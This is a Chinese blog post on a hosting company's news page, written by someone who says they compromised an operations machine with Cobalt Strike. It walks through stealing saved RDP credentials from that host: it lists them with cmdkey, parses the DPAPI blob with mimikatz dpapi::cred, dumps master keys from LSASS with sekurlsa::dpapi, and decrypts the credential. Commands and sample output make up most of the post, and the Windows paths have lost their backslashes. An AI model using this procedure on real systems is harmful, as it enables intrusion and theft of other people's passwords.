行业动态

防御吧作为15年知名老牌域名服务商,CNNIC和CANN双认证域名注册商,已经
持续为500多万个域名提供服务,包括智能DNS/自由转移/隐私保护等服务!
获取远程主机保存的RDP凭据密码
2022-10-25 11:45:25 【

拿下一台运维机,上了个CS,发现曾经连接过几台服务器并且保存了凭据,网上查了圈发现CS不支持交互式mimikatz,记录下获取远程主机RDP凭据。

Windows保存RDP凭据的目录是C:Users用户名AppDataLocalMicrosoftCredentials

   

可通过命令行获取,执行: cmdkey /list或powerpick Get-ChildItem C:Usersrasta_mouseAppDataLocalMicrosoftCredentials -Force

   

注意:cmdkey /list命令务必在Session会话下执行,system下执行无结果。

使用cobalt strike中的mimikatz可以获取一部分接下来要用到的masterkey和pbData

   
mimikatz dpapi::cred /in:C:UsersUSERNAMEAppDataLocalMicrosoftCredentialsSESSIONID

输出应类似

**BLOB**dwVersion          : 00000001 - 1guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}dwMasterKeyVersion : 00000001 - 1guidMasterKey      : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}dwFlags            : 20000000 - 536870912 (system ; )dwDescriptionLen   : 00000012 - 18szDescription      : 本地凭据数据

algCrypt : 00006610 - 26128 (CALG_AES_256)dwAlgCryptLen : 00000100 - 256dwSaltLen : 00000020 - 32pbSalt : 726d845b8a4eba29875****10659ec2d5e210a48fdwHmacKeyLen : 00000000 - 0pbHmackKey : algHash : 0000800e - 32782 (CALG_SHA_512)dwAlgHashLen : 00000200 - 512dwHmac2KeyLen : 00000020 - 32pbHmack2Key : cda4760ed3fb1c7874****28973f5b5b403fe31f233dwDataLen : 000000c0 - 192pbData : d268f81c64a3867cd7e96d99578295ea55a47fcaad5f7dd6678989117fc565906cc5a8bfd37137171302b34611ba5****e0b94ae399f9883cf80050f0972693d72b35a9a90918a06ddwSignLen : 00000040 - 64pbSign : 63239d3169c99fd82404c0e230****37504cfa332bea4dca0655
需要关注的是guidMasterKey、pbData,pbData是我们要解密的数据,guidMasterKey是解密所需要的密钥。这里LSASS已经在其缓存中存有这个key因此我们可以使用SeDebugPrivilege获取。
   
beacon> mimikatz !sekurlsa::dpapi
imikatz !sekurlsa::dpapi
      [00000001]     
      * GUID      :    {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}     
      * Time      :    2020/1/3 8:05:02     
      * MasterKey :    02b598c2252fa5d8f7fcd***7737644186223f44cb7d958148     
      * sha1(key) :    3e6dc57a0fe****a902cfaf617b1322     [00000002]     
      * GUID      :    {edcb491a-91d7-4d98-a714-8bc60254179f}     
      * Time      :    2020/1/3 8:05:02     
      * MasterKey :    c17a4aa87e9848e9f46c8ca81330***79381103f4137d3d97fe202     
      * sha1(key) :    5e1b3eb1152d3****6d3d6f90aaeb

   

然后将凭据保存到本地,执行

   
mimikatz "dpapi::cred /in:C:UsersUSERNAMEDesktoptestSESSION /masterkey:对应的GUID key"

   

       
   

   

】【打印关闭】 【返回顶部
分享到QQ空间
分享到: 
上一篇如何确保服务器中的数据安全呢? 下一篇国网B接口资源上报(Push_Resourse..

立足首都,辐射全球,防御吧专注云防御及云计算服务15年!

联系我们

服务热线:010-56157787 ,010-56159998
企业QQ:4000043998
技术支持:010-56159998
E-Mail:800@fangyuba.com
Copyright ? 2003-2016 fangyuba. 防御吧(完美解决防御与加速) 版权所有 增值许可:京B2-20140042号
售前咨询
公司总机:4000043998 01056155355
24小时电话:010-56159998
投诉电话:18910191973
值班售后/技术支持
售后服务/财务
备案专员
紧急电话:18610088800